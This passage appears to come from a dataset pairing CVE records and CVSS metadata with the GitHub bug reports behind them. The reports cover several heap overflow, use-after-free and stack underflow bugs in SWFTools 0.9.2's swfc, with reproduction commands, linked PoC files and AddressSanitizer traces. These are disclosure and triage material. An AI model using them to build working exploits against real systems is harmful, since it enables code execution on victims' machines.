f9 f9 f9 f9 0x00008028b090: 00 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 0x00008028b0a0: 04 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 0x00008028b0b0: 04 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 0x00008028b0c0: 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 =>0x00008028b0d0: 00 f9 f9 f9 f9 f9 f9 f9 04[f9]f9 f9 f9 f9 f9 f9 0x00008028b0e0: 00 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 0x00008028b0f0: 00 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 0x00008028b100: 04 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 0x00008028b110: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00 0x00008028b120: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==47121==ABORTING ```
global-buffer-overflow exists in countline() at lib/swf5compiler.flex:327
https://api.github.com/repos/swftools/swftools/issues/212/comments
0
2024-01-10T12:20:57Z
2024-01-11T06:47:20Z
https://github.com/swftools/swftools/issues/212
2,074,257,410
212
CVE-2024-22913
2024-01-19T18:15:08.767
A heap-buffer-overflow was found in SWFTools v0.9.2, in the function swf5lex at lex.swf5.c:1321. It allows an attacker to cause code execution.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/213" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/213
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
# Summary A heap-buffer-overflow caused when using swfc, which results in out-of-bounds write. # Version ``` $ ./swfc -V swfc - part of swftools 0.9.2 $ git log --oneline -1 772e55a2 (HEAD, origin/master, origin/HEAD, master) ``` # Platform ``` $ uname -a Linux 1cc373898f58 5.4.0-150-generic #167~18.04.1-Ubuntu SMP Wed May 24 00:51:42 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux clang version : 12.0.0 ``` # Reproduce PoC : [poc.zip](https://github.com/matthiaskramm/swftools/files/13887617/poc.zip) Command Line : `./swfc poc` # Debug Info ``` ==50670==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6290000000d9 at pc 0x0000007bbe80 bp 0x7fffffffc270 sp 0x7fffffffc268 WRITE of size 1 at 0x6290000000d9 thread T0 #0 0x7bbe7f in swf5lex /src/project/swftools_project/swftools/lib/lex.swf5.c:1321:10 #1 0x7f0ec6 in swf5parse /src/project/swftools_project/swftools/lib/swf5compiler.tab.c:3061:16 #2 0x67fe3d in compileSWFActionCode /src/project/swftools_project/swftools/lib/action/actioncompiler.c:90:6 #3 0x58fb43 in swf_ActionCompile /src/project/swftools_project/swftools/lib/modules/swfaction.c:1111:11 #4 0x5005d5 in s_action /src/project/swftools_project/swftools/src/swfc.c:1966:13 #5 0x541fd0 in c_action /src/project/swftools_project/swftools/src/swfc.c #6 0x51b3ad in parseArgumentsForCommand /src/project/swftools_project/swftools/src/swfc.c:4475:5 #7 0x51b3ad in main /src/project/swftools_project/swftools/src/swfc.c:4598:2 #8 0x7ffff7c39082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) #9 0x41d61d in _start (/src/project/swftools_project/swftools/src/swfc+0x41d61d) 0x6290000000d9 is located 295 bytes to the left of 16386-byte region [0x629000000200,0x629000004202) freed by thread T0 here: #0 0x498612 in free (/src/project/swftools_project/swftools/src/swfc+0x498612) #1 0x4e8c6e in yyfree /src/project/swftools_project/swftools/src/parser.yy.c:2217:2 #2 0x4e8c6e in yy_delete_buffer /src/project/swftools_project/swftools/src/parser.yy.c:1759:3 #3 0x4e8c6e in generateTokens /src/project/swftools_project/swftools/src/parser.lex:315:5 #4 0x51aa9d in main /src/project/swftools_project/swftools/src/swfc.c:4585:12 #5 0x7ffff7c39082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) previously allocated by thread T0 here: #0 0x49887d in malloc (/src/project/swftools_project/swftools/src/swfc+0x49887d) #1 0x4db8e7 in yyalloc /src/project/swftools_project/swftools/src/parser.yy.c:2200:18 #2 0x4db8e7 in yy_create_buffer /src/project/swftools_project/swftools/src/parser.yy.c:1734:26 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/project/swftools_project/swftools/lib/lex.swf5.c:1321:10 in swf5lex Shadow bytes around the buggy address: 0x0c527fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c527fff8010: fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa fa 0x0c527fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff8040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c527fff8050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c527fff8060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==50670==ABORTING ```
heap-buffer-overflow exit in swf5lex() at lib/lex.swf5.c:1321
https://api.github.com/repos/swftools/swftools/issues/213/comments
0
2024-01-10T12:41:19Z
2024-01-11T06:46:59Z
https://github.com/swftools/swftools/issues/213
2,074,294,602
213
CVE-2024-22914
2024-01-19T18:15:08.807
A heap-use-after-free was found in SWFTools v0.9.2, in the function input at lex.swf5.c:2620. It allows an attacker to cause denial of service.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/214" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/214
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
# Summary A heap-use-after-free caused when using swfc. # Version ``` $ ./swfc -V swfc - part of swftools 0.9.2 $ git log --oneline -1 772e55a2 (HEAD, origin/master, origin/HEAD, master) ``` # Platform ``` $ uname -a Linux 1cc373898f58 5.4.0-150-generic #167~18.04.1-Ubuntu SMP Wed May 24 00:51:42 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux clang version : 12.0.0 ``` # Reproduce PoC : [poc.zip](https://github.com/matthiaskramm/swftools/files/13887806/poc.zip) Command Line : `./swfc poc` # Debug Info ``` ==52814==ERROR: AddressSanitizer: heap-use-after-free on address 0x6020000000d0 at pc 0x0000007bdfd1 bp 0x7fffffffc270 sp 0x7fffffffc268 READ of size 8 at 0x6020000000d0 thread T0 #0 0x7bdfd0 in input /src/project/swftools_project/swftools/lib/lex.swf5.c:2620:24 #1 0x7bdfd0 in getinput /src/project/swftools_project/swftools/lib/swf5compiler.flex:315:13 #2 0x7bdfd0 in comment1 /src/project/swftools_project/swftools/lib/swf5compiler.flex:400:16 #3 0x7bdfd0 in swf5lex /src/project/swftools_project/swftools/lib/swf5compiler.flex:255:12 #4 0x7f0ec6 in swf5parse /src/project/swftools_project/swftools/lib/swf5compiler.tab.c:3061:16 #5 0x67fe3d in compileSWFActionCode /src/project/swftools_project/swftools/lib/action/actioncompiler.c:90:6 #6 0x58fb43 in swf_ActionCompile /src/project/swftools_project/swftools/lib/modules/swfaction.c:1111:11 #7 0x5005d5 in s_action /src/project/swftools_project/swftools/src/swfc.c:1966:13 #8 0x541fd0 in c_action /src/project/swftools_project/swftools/src/swfc.c #9 0x51b3ad in parseArgumentsForCommand /src/project/swftools_project/swftools/src/swfc.c:4475:5 #10 0x51b3ad in main /src/project/swftools_project/swftools/src/swfc.c:4598:2 #11 0x7ffff7c39082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) #12 0x41d61d in _start (/src/project/swftools_project/swftools/src/swfc+0x41d61d) 0x6020000000d5 is located 0 bytes to the right of 5-byte region [0x6020000000d0,0x6020000000d5) freed by thread T0 here: #0 0x498612 in free (/src/project/swftools_project/swftools/src/swfc+0x498612) #1 0x9734c3 in dict_free_all /src/project/swftools_project/swftools/lib/q.c:1354:17 #2 0x9734c3 in map_clear /src/project/swftools_project/swftools/lib/q.c:1484:5 previously allocated by thread T0 here: #0 0x484174 in strdup (/src/project/swftools_project/swftools/src/swfc+0x484174) #1 0x96b129 in dict_put /src/project/swftools_project/swftools/lib/q.c:1154:14 SUMMARY: AddressSanitizer: heap-use-after-free /src/project/swftools_project/swftools/lib/lex.swf5.c:2620:24 in input Shadow bytes around the buggy address: 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa 00 fa fa fa fd fa fa fa fd fd fa fa fd fa =>0x0c047fff8010: fa fa fd fd fa fa fd fa fa fa[fd]fa fa fa fd fd 0x0c047fff8020: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa 0x0c047fff8030: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 0x0c047fff8040: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fd 0x0c047fff8050: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fa 0x0c047fff8060: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==52814==ABORTING ```
heap-use-after-free exit in input() at lib/lex.swf5.c:2620
https://api.github.com/repos/swftools/swftools/issues/214/comments
0
2024-01-10T12:47:45Z
2024-01-11T06:46:39Z
https://github.com/swftools/swftools/issues/214
2,074,305,829
214
CVE-2024-22915
2024-01-19T18:15:08.847
A heap-use-after-free was found in SWFTools v0.9.2, in the function swf_DeleteTag at rfxswf.c:1193. It allows an attacker to cause code execution.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/215" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/215
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
# Summary A heap-use-after-free caused when using swfc, which results in out-of-bounds write. # Version ``` $ ./swfc -V swfc - part of swftools 0.9.2 $ git log --oneline -1 772e55a2 (HEAD, origin/master, origin/HEAD, master) ``` # Platform ``` $ uname -a Linux 1cc373898f58 5.4.0-150-generic #167~18.04.1-Ubuntu SMP Wed May 24 00:51:42 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux clang version : 12.0.0 ``` # Reproduce PoC : [poc.zip](https://github.com/matthiaskramm/swftools/files/13887912/poc.zip) Command Line : `./swfc poc` # Debug Info ``` ==585==ERROR: AddressSanitizer: heap-use-after-free on address 0x606000023860 at pc 0x000000641f43 bp 0x7fffffffe1b0 sp 0x7fffffffe1a8 WRITE of size 8 at 0x606000023860 thread T0 #0 0x641f42 in swf_DeleteTag /src/project/swftools_project/swftools/lib/rfxswf.c:1193:30 #1 0x50ce45 in removeFromTo /src/project/swftools_project/swftools/src/swfc.c:842:6 #2 0x50ce45 in s_endSWF /src/project/swftools_project/swftools/src/swfc.c:1041:8 #3 0x50ce45 in s_end /src/project/swftools_project/swftools/src/swfc.c:2380:13 #4 0x542aaf in c_end /src/project/swftools_project/swftools/src/swfc.c:3769:5 #5 0x51b3ad in parseArgumentsForCommand /src/project/swftools_project/swftools/src/swfc.c:4475:5 #6 0x51b3ad in main /src/project/swftools_project/swftools/src/swfc.c:4598:2 #7 0x7ffff7c39082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) #8 0x41d61d in _start (/src/project/swftools_project/swftools/src/swfc+0x41d61d) 0x606000023860 is located 32 bytes inside of 56-byte region [0x606000023840,0x606000023878) freed by thread T0 here: #0 0x498612 in free (/src/project/swftools_project/swftools/src/swfc+0x498612) #1 0x657993 in swf_FreeTags /src/project/swftools_project/swftools/lib/rfxswf.c:1933:5 previously allocated by thread T0 here: #0 0x4989f2 in calloc (/src/project/swftools_project/swftools/src/swfc+0x4989f2) #1 0x9bce08 in rfx_calloc /src/project/swftools_project/swftools/lib/mem.c:69:9 SUMMARY: AddressSanitizer: heap-use-after-free /src/project/swftools_project/swftools/lib/rfxswf.c:1193:30 in swf_DeleteTag Shadow bytes around the buggy address: 0x0c0c7fffc6b0: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa 0x0c0c7fffc6c0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd 0x0c0c7fffc6d0: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fa 0x0c0c7fffc6e0: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa 0x0c0c7fffc6f0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd =>0x0c0c7fffc700: fd fd fd fa fa fa fa fa fd fd fd fd[fd]fd fd fa 0x0c0c7fffc710: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa 0x0c0c7fffc720: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00 0x0c0c7fffc730: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00 0x0c0c7fffc740: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa 0x0c0c7fffc750: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==585==ABORTING ```
heap-use-after-free exit in swf_DeleteTag() at lib/rfxswf.c:1193
https://api.github.com/repos/swftools/swftools/issues/215/comments
0
2024-01-10T12:59:20Z
2024-01-11T06:45:39Z
https://github.com/swftools/swftools/issues/215
2,074,326,548
215
CVE-2024-22919
2024-01-19T18:15:08.950
swftools0.9.2 was discovered to contain a global-buffer-overflow vulnerability via the function parseExpression at swftools/src/swfc.c:2587.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/209" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/209
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
# project https://github.com/matthiaskramm/swftools version:0.9.2 # os info Ubuntu20.04 TLS # poc [poc.zip](https://github.com/matthiaskramm/swftools/files/13783540/poc.zip) # build git clone https://github.com/matthiaskramm/swftools.git cd swftools ./configure --disable-shared && make ./swftools/src/swfc ./poc # ASAN Info ================================================================= ==3086431==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000007396e0 at pc 0x0000004eabb5 bp 0x7ffd37ab4810 sp 0x7ffd37ab4808 READ of size 4 at 0x0000007396e0 thread T0 #0 0x4eabb4 in parseExpression /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:2587:22 #1 0x4eabb4 in parseTwip /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:2634:19 #2 0x4fa56b in c_edittext /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:4097:18 #3 0x4ee709 in parseArgumentsForCommand /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:4475:5 #4 0x4ee709 in main /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:4598:2 #5 0x7f8305cd7082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #6 0x41d63d in _start (/home/ubuntu/fuzz/swftools/swftools/src/swfc+0x41d63d) 0x0000007396e0 is located 32 bytes to the left of global variable '<string literal>' defined in 'swfc.c:3949:34' (0x739700) of size 7 '<string literal>' is ascii string 'format' 0x0000007396e0 is located 26 bytes to the right of global variable '<string literal>' defined in 'swfc.c:2934:40' (0x7396c0) of size 6 '<string literal>' is ascii string 'slope' SUMMARY: AddressSanitizer: global-buffer-overflow /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:2587:22 in parseExpression Shadow bytes around the buggy address: 0x0000800df280: 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9 02 f9 f9 f9 0x0000800df290: f9 f9 f9 f9 00 00 00 07 f9 f9 f9 f9 00 01 f9 f9 0x0000800df2a0: f9 f9 f9 f9 00 00 00 00 02 f9 f9 f9 f9 f9 f9 f9 0x0000800df2b0: 06 f9 f9 f9 f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 0x0000800df2c0: 07 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 =>0x0000800df2d0: 00 f9 f9 f9 f9 f9 f9 f9 06 f9 f9 f9[f9]f9 f9 f9 0x0000800df2e0: 07 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 0x0000800df2f0: 06 f9 f9 f9 f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 0x0000800df300: 07 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 0x0000800df310: 00 00 00 04 f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 0x0000800df320: 00 01 f9 f9 f9 f9 f9 f9 00 01 f9 f9 f9 f9 f9 f9 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3086431==ABORTING
global-buffer-overflow exists in the function parseExpression in swftools/src/swfc.c:2587
https://api.github.com/repos/swftools/swftools/issues/209/comments
0
2023-12-28T05:21:08Z
2024-01-11T01:14:11Z
https://github.com/swftools/swftools/issues/209
2,058,003,911
209
CVE-2024-22955
2024-01-19T18:15:09.003
swftools 0.9.2 was discovered to contain a stack-buffer-underflow vulnerability via the function parseExpression at swftools/src/swfc.c:2576.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/207" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/207
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
# project https://github.com/matthiaskramm/swftools version:0.9.2 # os info Ubuntu20.04 TLS # poc [gbo_poc.zip](https://github.com/matthiaskramm/swftools/files/13783442/gbo_poc.zip) # build git clone https://github.com/matthiaskramm/swftools.git cd swftools ./configure --disable-shared && make ./swftools/src/swfc ./gbo_poc # ASAN Info ================================================================= ==885099==ERROR: AddressSanitizer: stack-buffer-underflow on address 0x7ffdcd21615c at pc 0x0000004eaba8 bp 0x7ffdcd216130 sp 0x7ffdcd216128 READ of size 4 at 0x7ffdcd21615c thread T0 #0 0x4eaba7 in parseExpression /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:2576:12 #1 0x4eaba7 in parseTwip /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:2634:19 #2 0x4fa56b in c_edittext /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:4097:18 #3 0x4ee709 in parseArgumentsForCommand /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:4475:5 #4 0x4ee709 in main /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:4598:2 #5 0x7f36ff241082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #6 0x41d63d in _start (/home/ubuntu/fuzz/swftools/swftools/src/swfc+0x41d63d) Address 0x7ffdcd21615c is located in stack of thread T0 at offset 28 in frame #0 0x4e954f in parseTwip /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:2632 This frame has 3 object(s): [32, 1056) 'chr2index.i' (line 2528) <== Memory access at offset 28 underflows this variable [1184, 2208) 'stack.i' (line 2539) [2336, 4384) 'values.i' (line 2540) HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-underflow /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:2576:12 in parseExpression Shadow bytes around the buggy address: 0x100039a3abd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100039a3abe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100039a3abf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100039a3ac00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100039a3ac10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x100039a3ac20: 00 00 00 00 00 00 00 00 f1 f1 f1[f1]00 00 00 00 0x100039a3ac30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100039a3ac40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100039a3ac50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100039a3ac60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100039a3ac70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==885099==ABORTING
stack-buffer-underflow exists in the function parseExpression in swftools/src/swfc.c:2576
https://api.github.com/repos/swftools/swftools/issues/207/comments
0
2023-12-28T05:05:17Z
2024-01-25T06:24:07Z
https://github.com/swftools/swftools/issues/207
2,057,993,750
207
CVE-2024-22956
2024-01-19T18:15:09.050
swftools 0.9.2 was discovered to contain a heap-use-after-free vulnerability via the function removeFromTo at swftools/src/swfc.c:838
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/208" } ]
